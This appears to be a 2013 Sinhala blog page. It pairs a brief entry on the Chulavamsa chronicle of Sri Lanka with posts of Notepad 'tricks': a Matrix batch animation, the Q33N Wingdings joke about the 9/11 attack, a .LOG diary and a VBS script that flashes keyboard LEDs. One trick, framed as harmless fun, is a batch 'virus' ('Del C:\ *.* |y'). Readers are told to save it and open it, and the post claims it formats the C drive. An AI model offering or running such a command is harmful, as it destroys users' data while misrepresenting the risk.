Saturday, January 26, 2013

චූලවංශය


                                                                    චූලවංශය


බුදු දහම
බුදුරජාණන් වහන්සේ
අටවිසි බුදුවරු
ශ්‍රී සද්ධර්මය
ආර්ය සංඝයා වහන්සේ
මූලික සංකල්ප
තිසරණය
චතුරාර්ය සත්‍යය
පටිච්ච සමුප්පාදය
නිර්වාණය
ආර්ය අෂ්ටාංගික මාර්ගය
වෙනත්
බුදු දහමේ ඉතිහාසය
 (කාල රේඛාව)
ප්‍රකට බෞද්ධයින්
බුදු දහම, කලාපය අනුව
ත්‍රිපිටකය
ධර්ම සංගායනා
බෞද්ධ සංස්කෘතිය
නිකාය
මහායානය
වජ්‍රයානය

චූලවංශය යනු සිංහලේ රාජාවලිය ගැන පාලි භාෂාවෙන් ලියැවුන ඓතිහාසික වාර්තාවකි. මෙයින් සිව්වන (4) ශතවර්ෂයේ සිට 1815 දක්වා වූ කාලය ආවර්ණය වේ.
චූලවංශය, සිංහල බෞද්ධ භික්ෂූන් විසින් වසර ගණනාවක් මුළුල්ලේ සංස්කරණය කරන ලද්දකි වන අතර මෙය හයවන (6) සියවසේ මහානාම හිමියන් විසින් රචිත මහාවංශයේ, දෙවන කොටස ලෙසද සැලකනු ලබයි. එසේම සමහර අවස්ථා වලදී මහාවංශය සහ චූලවංශය යනු ශ්‍රී ලංකාවේ ඉතිහාසයේ වසර දෙදහසකට (2000) වඩා වැඩි කාලයක් ගැන විස්තර කෙරෙන එකම (මහාවංශය යන නමින්ම) ග්‍රන්ථයක් ලෙසද සලකනු ලබයි.
චූලවංශය ප්‍රධාන කොටස් දෙකකින් යුක්ත වෙයි. එහි මුල් කොටස සිව් වන (4) සියවසේ සිද්ධාර්ථ ගෞතමයාණන් වහන්සේගේ දන්ත ධාතුව ලක්දිවට වැඩමවීමෙන් ආරම්භ වී මහා පරාක්‍රමබාහු රජුගේ (1153-1186) රාජ්‍ය කාලයෙන් අවසන් වෙයි.

Notepad



Notepad එකෙන් matrix බලමුද

  0 
 
  0 

                     

එහෙනම් වෑඩෙ පටන් ගමු....
මුලින්ම් මේ කෝඩ්ස්  ටික කොපි කරගෙන notepad එකට දාගන්නකෝ. 


    @echo off
    cls
    title Enter The Matrix(pctrickks.blogspot.com)
    color 02

    set string=Wake up Neo...
    set /a len=18
    call :DisplayText

    ping localhost -n 4 >nul
    set string=The Matrix has you...
    set /a len=25
    call :DisplayText

    ping localhost -n 4 >nul
    set string=Follow the white rabbit.
    set /a len=28
    call :DisplayText

    ping localhost -n 4 >nul
    set string=Knock, knock, Neo...
    set /a len=24
    call :DisplayText

    ping localhost -n 4 >nul


    goto matrix


    :DisplayText

    set /a dispvar =1
    set /a len +=1

    :DisplayLoop

    CALL SET str=%%string:~0,

    %dispvar%%%

    cls
    echo %str%
    ping localhost -n 1 >nul

    set /a dispvar +=1

    if '%dispvar%'=='%len%' goto

    enddisplay

    goto DisplayLoop

    :enddisplay
    exit /b

    :matrix
    setlocal enabledelayedexpansion
    for /l %%A in (1,1,39) do (
    set /a rnd=!random!%%5+1
    if !rnd!==1 (
    set /a rnd2=!random!%%26+1
    set num=1
    for %%A in (A B C D E F G H I J K L

    M N O P Q R S T U V W X Y Z) do (
    if !rnd2!==!num! (
    set add=%%A
    )
    set /a num+=1
    )
    ) else set /a add=!rnd!%%2
    set var=!var! !add!
    )
    echo !var!
    call :matrix

      ඊලගට මේක  කැමති නමකින් save කරගන්න.හැබැයි මතක තියාගෙනම
      මේකෙ නමේ අගට  .bat කියන කෑල්ල එකතු කරන්න. 
      ex- matrix.bat
      වෑඩ කෑල්ල හොදයිද?

Notepad එකෙන් වඩ කෑලි 5ක්.

  0 
 
  0


                         
1. World Trade Center Attack Trick


    1. Notepad එක Open කරලා මේ cord එක Type කරන්න“Q33N” (quotes නෑතිව) in capital letters.
    2. දැන් font size to 72.
    3. Font එක Wingdings. වෙනස් කරන්න

2. Matrix Effect Trick

1.notepad එක Open කරලා එකට මේ Code එක past කරගන්න.

    @echo off
    color 02
    :start
    echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
    goto start


    2. දැන් Matrix.bat කියලාsave කරන්න
    3. දැන් saved file  එක open කරන්න

3. Creating Virus That Format C Drive

    1. notepad එක Open කරලා මේ Code එක past කරගන්න.


    @Echo off
    Del C:\ *.* |y


    2. දැන් virus.bat කියලාsave කරන්න   
    3. දැන් saved file  එක open කරන්න C Drive.එක format වෙනව බලගෙන


4. Making Personal Diary Using Notepad 

   1 notepad එක Open කරලා .LOG කියලා Type කරගන්න. (capital Letters  වලින්)දැන් enter කරන්න
   2.කමති නමකින්Save කරන්න
   3. දැන් saved file  එක open කරන්න
 
5. Dancing Keyboard Led

   1. notepad එක Open කරලා මේ Code එක past කරගන්න.

    Set wshShell =wscript.CreateObject("WScript.Shell")
    do
    wscript.sleep 100
    wshshell.sendkeys "{CAPSLOCK}"
    wshshell.sendkeys "{NUMLOCK}"
    wshshell.sendkeys "{SCROLLLOCK}"
    loop

    2. දැන්dance.vbs කියලා save කරන්න     
    3. දැන් saved file  එක open කරලා බලන්න keyboard එකෙ led lights  ටික